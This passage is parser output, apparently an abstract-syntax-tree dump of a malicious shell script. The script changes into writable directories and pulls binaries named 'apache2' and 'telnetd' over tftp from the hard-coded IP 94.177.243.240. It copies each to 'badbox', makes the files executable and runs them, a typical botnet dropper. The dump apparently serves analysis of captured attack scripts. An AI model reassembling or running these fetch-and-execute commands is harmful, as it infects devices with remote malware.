  ]),
  OperatorNode(lineno=15, op=';', pos=(1539, 1540)),
  CommandNode(lineno=15, pos=(1540, 1548), parts=[
    WordNode(lineno=15, pos=(1540, 1548), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1549, 1670), parts=[
  CommandNode(lineno=16, pos=(1549, 1556), parts=[
    WordNode(lineno=16, pos=(1549, 1551), word='cd'),
    WordNode(lineno=16, pos=(1552, 1556), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1557, 1559)),
  CommandNode(lineno=16, pos=(1560, 1571), parts=[
    WordNode(lineno=16, pos=(1560, 1562), word='cd'),
    WordNode(lineno=16, pos=(1563, 1571), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1572, 1574)),
  CommandNode(lineno=16, pos=(1575, 1582), parts=[
    WordNode(lineno=16, pos=(1575, 1577), word='cd'),
    WordNode(lineno=16, pos=(1578, 1582), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1583, 1585)),
  CommandNode(lineno=16, pos=(1586, 1594), parts=[
    WordNode(lineno=16, pos=(1586, 1588), word='cd'),
    WordNode(lineno=16, pos=(1589, 1594), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1595, 1597)),
  CommandNode(lineno=16, pos=(1598, 1602), parts=[
    WordNode(lineno=16, pos=(1598, 1600), word='cd'),
    WordNode(lineno=16, pos=(1601, 1602), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1602, 1603)),
  CommandNode(lineno=16, pos=(1604, 1634), parts=[
    WordNode(lineno=16, pos=(1604, 1608), word='tftp'),
    WordNode(lineno=16, pos=(1609, 1623), word='94.177.243.240'),
    WordNode(lineno=16, pos=(1624, 1626), word='-c'),
    WordNode(lineno=16, pos=(1627, 1630), word='get'),
    WordNode(lineno=16, pos=(1631, 1634), word=' '),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1634, 1635)),
  CommandNode(lineno=16, pos=(1635, 1650), parts=[
    WordNode(lineno=16, pos=(1635, 1638), word='cat'),
    WordNode(lineno=16, pos=(1639, 1642), word=' '),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1644, 1650), word='badbox'), pos=(1643, 1650), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1650, 1651)),
  CommandNode(lineno=16, pos=(1651, 1661), parts=[
    WordNode(lineno=16, pos=(1651, 1656), word='chmod'),
    WordNode(lineno=16, pos=(1657, 1659), word='+x'),
    WordNode(lineno=16, pos=(1660, 1661), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1661, 1662)),
  CommandNode(lineno=16, pos=(1662, 1670), parts=[
    WordNode(lineno=16, pos=(1662, 1670), word='./badbox'),
  ]),
])
ListNode(lineno=17, pos=(1671, 1800), parts=[
  CommandNode(lineno=17, pos=(1671, 1678), parts=[
    WordNode(lineno=17, pos=(1671, 1673), word='cd'),
    WordNode(lineno=17, pos=(1674, 1678), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1679, 1681)),
  CommandNode(lineno=17, pos=(1682, 1693), parts=[
    WordNode(lineno=17, pos=(1682, 1684), word='cd'),
    WordNode(lineno=17, pos=(1685, 1693), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1694, 1696)),
  CommandNode(lineno=17, pos=(1697, 1704), parts=[
    WordNode(lineno=17, pos=(1697, 1699), word='cd'),
    WordNode(lineno=17, pos=(1700, 1704), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1705, 1707)),
  CommandNode(lineno=17, pos=(1708, 1716), parts=[
    WordNode(lineno=17, pos=(1708, 1710), word='cd'),
    WordNode(lineno=17, pos=(1711, 1716), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1717, 1719)),
  CommandNode(lineno=17, pos=(1720, 1724), parts=[
    WordNode(lineno=17, pos=(1720, 1722), word='cd'),
    WordNode(lineno=17, pos=(1723, 1724), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1724, 1725)),
  CommandNode(lineno=17, pos=(1726, 1760), parts=[
    WordNode(lineno=17, pos=(1726, 1730), word='tftp'),
    WordNode(lineno=17, pos=(1731, 1745), word='94.177.243.240'),
    WordNode(lineno=17, pos=(1746, 1748), word='-c'),
    WordNode(lineno=17, pos=(1749, 1752), word='get'),
    WordNode(lineno=17, pos=(1753, 1760), word='apache2'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1760, 1761)),
  CommandNode(lineno=17, pos=(1761, 1780), parts=[
    WordNode(lineno=17, pos=(1761, 1764), word='cat'),
    WordNode(lineno=17, pos=(1765, 1772), word='apache2'),
    RedirectNode(lineno=17, output=
      WordNode(lineno=17, pos=(1774, 1780), word='badbox'), pos=(1773, 1780), type='>'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1780, 1781)),
  CommandNode(lineno=17, pos=(1781, 1791), parts=[
    WordNode(lineno=17, pos=(1781, 1786), word='chmod'),
    WordNode(lineno=17, pos=(1787, 1789), word='+x'),
    WordNode(lineno=17, pos=(1790, 1791), word='*'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1791, 1792)),
  CommandNode(lineno=17, pos=(1792, 1800), parts=[
    WordNode(lineno=17, pos=(1792, 1800), word='./badbox'),
  ]),
])
ListNode(lineno=18, pos=(1801, 1930), parts=[
  CommandNode(lineno=18, pos=(1801, 1808), parts=[
    WordNode(lineno=18, pos=(1801, 1803), word='cd'),
    WordNode(lineno=18, pos=(1804, 1808), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1809, 1811)),
  CommandNode(lineno=18, pos=(1812, 1823), parts=[
    WordNode(lineno=18, pos=(1812, 1814), word='cd'),
    WordNode(lineno=18, pos=(1815, 1823), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1824, 1826)),
  CommandNode(lineno=18, pos=(1827, 1834), parts=[
    WordNode(lineno=18, pos=(1827, 1829), word='cd'),
    WordNode(lineno=18, pos=(1830, 1834), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1835, 1837)),
  CommandNode(lineno=18, pos=(1838, 1846), parts=[
    WordNode(lineno=18, pos=(1838, 1840), word='cd'),
    WordNode(lineno=18, pos=(1841, 1846), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1847, 1849)),
  CommandNode(lineno=18, pos=(1850, 1854), parts=[
    WordNode(lineno=18, pos=(1850, 1852), word='cd'),
    WordNode(lineno=18, pos=(1853, 1854), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1854, 1855)),
  CommandNode(lineno=18, pos=(1856, 1890), parts=[
    WordNode(lineno=18, pos=(1856, 1860), word='tftp'),
    WordNode(lineno=18, pos=(1861, 1875), word='94.177.243.240'),
    WordNode(lineno=18, pos=(1876, 1878), word='-c'),
    WordNode(lineno=18, pos=(1879, 1882), word='get'),
    WordNode(lineno=18, pos=(1883, 1890), word='telnetd'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1890, 1891)),
  CommandNode(lineno=18, pos=(1891, 1910), parts=[
    WordNode(lineno=18, pos=(1891, 1894), word='cat'),
    WordNode(lineno=18, pos=(1895, 1902), word='telnetd'),
    RedirectNode(lineno=18, output=
      WordNode(lineno=18, pos=(1904, 1910), word='badbox'), pos=(1903, 1910), type='>'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1910, 1911)),
  CommandNode(lineno=18, pos=(1911, 1921), parts=[
    WordNode(lineno=18, pos=(1911, 1916), word='chmod'),
    WordNode(lineno=18, pos=(1917, 1919), word='+x'),
    WordNode(lineno=18, pos=(1920, 1921), word='*'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1921, 1922)),
  CommandNode(lineno=18, pos=(1922, 1930), parts=[
    WordNode(lineno=18, pos=(1922, 1930), word='./badbox'),
  ]),
])
